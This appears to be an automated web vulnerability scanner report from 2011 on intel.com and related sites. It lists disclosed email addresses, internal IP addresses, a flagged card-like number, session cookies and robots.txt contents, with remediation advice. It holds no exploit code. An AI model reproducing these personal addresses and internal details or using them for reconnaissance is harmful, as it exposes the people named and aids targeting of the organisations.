INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:39 GMT Content-Length: 28058 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The following email address was disclosed in the response:
intel.foundation@intel.com
Request
GET /about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:33 GMT Content-Length: 31901 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The following email addresses were disclosed in the response:
MOBusinessOffice@atosorigin.com
bridget.karlin@compucom.com
criley@syssrc.com
cspencer@enpointe.com
cthorsen@pdspc.com
jason.livingston@be-intuitive.com
lbaliak@lenovo.com
lorric@lenovo.com
mneff@advancedmarketplace.com
sales@binary.ag
sflahert@syssrc.com
vpro@valerent.com
Request
GET /business/vpro/alliance/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57048
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel vPro Technology Alliance</title>
The following email address was disclosed in the response:
ireland.esc.hire@intel.com
Request
GET /corporate/europe/emea/irl/intel/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:21 GMT Content-Length: 24236 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel Ireland</title> <meta http-equiv='Content-T ...[SNIP]... <a href="mailto:ireland.esc.hire@intel.com"> ...[SNIP]...
The following email address was disclosed in the response:
sam@sam3000.com
Request
GET /embedded/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <meta ht ...[SNIP]... riable Value>');lpAddVars('page','Title','');lpAddVars('visitor','FirstName','Sam');lpAddVars('visitor','BusinessID','');lpAddVars('visitor','BusinessName','Fusion Media');lpAddVars('visitor','Email','sam@sam3000.com');lpAddVars('visitor','LoginID','sam@sam3000.com');lpAddVars('visitor','MemberStatus','Privileged'); </script> ...[SNIP]...
The following email addresses were disclosed in the response:
anaite.hernandez@bm.com
anator@creativaempresarial.com
claudiaa@fidal-amlat.org
francisca.oliva@bm.com
gabriel.leonardo.andriollo@bm.com
itzel.castellanos@bm.com
jahiro.polo@bm.com
manuela.munoz@bm.com
marcela.vaccaro@bm.com
natalia.arbex@bm.com
raquel.golcher.beirute@intel.com
teresa.menendez@yr.com
Request
GET /espanol/pressroom/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 34098
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es-MX"> <head> <meta http-equiv=Content-Type content="text/html; charset=UTF-8">
The following email address was disclosed in the response:
bhb@iceburg.net
Request
GET /homepage/js/main.js HTTP/1.1 Host: www.intel.com Proxy-Connection: keep-alive Referer: http://www.intel.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_lv=1296945247431; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 17 Jan 2011 19:49:10 GMT Accept-Ranges: bytes ETag: "fca9a9c7fb6cb1:433e" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:01 GMT Connection: close Content-Length: 114524
/*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Incl ...[SNIP]... <bhb@iceburg.net> ...[SNIP]...
The following email address was disclosed in the response:
aaron.a.fischer@intel.com
Request
GET /sites/wap/cim_setup.js HTTP/1.1 Host: www.intel.com Proxy-Connection: keep-alive Referer: http://www.intel.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_lv=1296945247431; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Fri, 29 Jul 2005 17:34:16 GMT Accept-Ranges: bytes ETag: "63ea77be6394c51:426c" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:01 GMT Connection: close Content-Length: 2366
// cim_setup.js // // Author: Aaron Fischer (aaron.a.fischer@intel.com) // Created: 2004.10.08 // Description: Expands the wa_setup.js API with additional methods for programmatically // accessing a web page's metadata.
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Thu, 27 Jan 2011 14:46:43 GMT Accept-Ranges: bytes ETag: "1f517e331becb1:42bb" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:08 GMT Connection: close Content-Length: 49527
/** ********************************************************************************** PLEASE NOTE! THIS IS A MODIFIED VERSION OF JCAROUSELLITE TO ALLOW FOR "PAUSE" FUNCTIONALITY. http://www.er ...[SNIP]... llbacks. The functions will be passed an argument that represents an array of elements that * are visible at the time of callback. * * * @cat Plugins/Image Gallery * @author Ganeshji Marwaha/ganeshread@gmail.com */
(function($) { // Compliant with jquery.noConflict() $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: ...[SNIP]...
The following email addresses were disclosed in the response:
osi@opensource.org
webmaster@opensource.org
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email addresses were disclosed in the response:
daniel.joyce@villanova.edu
webmaster@sigcse.org
Request
GET /<BR/ HTTP/1.1 Host: www.sigcse.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:15:20 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 10731
The following email address was disclosed in the response:
webmaster@w3.org
Request
GET /1999/XSL/Transform HTTP/1.1 Host: www.w3.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:28 GMT Server: Apache/2 Content-Location: Transform.html Vary: negotiate,accept,Accept-Encoding TCN: choice Last-Modified: Wed, 12 May 2010 21:03:51 GMT ETag: "7f3-4866bfa9c1bc0;b4-46552f8754040" Accept-Ranges: bytes Content-Length: 2035 Cache-Control: max-age=21600 Expires: Sun, 06 Feb 2011 05:32:28 GMT P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml" Connection: close Content-Type: text/html; charset=iso-8859-1
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
The following RFC 1918 IP address was disclosed in the response:
10.18.8.222
Request
GET /?iid=gg_prod-en_US+ark HTTP/1.1 Host: ark.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P: C1 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=76390 Date: Sat, 05 Feb 2011 23:21:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 174001
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1"> <script la ...[SNIP]... <![CDATA[ function GetIdent() { return "10.18.8.222"; }
function GetReportSuiteName() { return "intelmatark"; } function GetSearchKeywords() { return ""; } // ]]> ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.2.129.225
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following credit card number was disclosed in the response:
4031753540039
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /feeds/api/videos/gpzM6Mask80/related HTTP/1.1 Host: gdata.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 200 OK X-GData-User-Country: FR Content-Type: application/atom+xml; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:23:13 GMT Date: Sat, 05 Feb 2011 23:23:13 GMT Cache-Control: private, max-age=300, no-transform Vary: * GData-Version: 1.0 Last-Modified: Sat, 05 Feb 2011 23:23:13 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close Content-Length: 109865
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
HTTP/1.0 200 OK Content-Type: text/plain;charset=utf-8 Connection: close Content-Length: 2553
# Notice: if you would like to crawl Facebook you can # contact us here: http://www.facebook.com/apps/site_scraping_tos.php # to apply for white listing. Our general terms are available # at http://ww ...[SNIP]...
HTTP/1.0 200 OK Content-Length: 458 Content-Type: text/plain Last-Modified: Fri, 05 Mar 2010 20:06:22 GMT Accept-Ranges: bytes ETag: "e7a994539fbcca1:428c" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sat, 05 Feb 2011 23:13:36 GMT Connection: close
# robots.txt exclusion for www.intel.com #
# for all agents, keep them out of the /cgi directory
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /about HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 23:21:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 15111
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
GET /copyright/ HTTP/1.1 Host: lz1.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:17 GMT Server: Microsoft-IIS/6.0 P: C2 X-Powered-By: ASP.NET Content-Length: 4103 ETag: "adf03a8e1246ca1:19a9fc" Last-Modified: Mon, 05 Oct 2009 23:21:24 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding
<HTML> <HEAD> <title>Copyright Permission</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="Visual Basic .NET 7.1" name="CODE_LANGUAGE"> <meta con ...[SNIP]...
GET /engine/ HTTP/1.1 Host: onsite2.researchintel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD;
Response
HTTP/1.1 403 Forbidden Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Date: Sat, 05 Feb 2011 23:17:29 GMT Connection: close
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b ...[SNIP]...
GET /Search/function.file HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: Apache/2.2.3 (CentOS) Date: Sun, 06 Feb 2011 01:51:24 GMT Content-Type: text/html Content-Length: 573 Connection: close
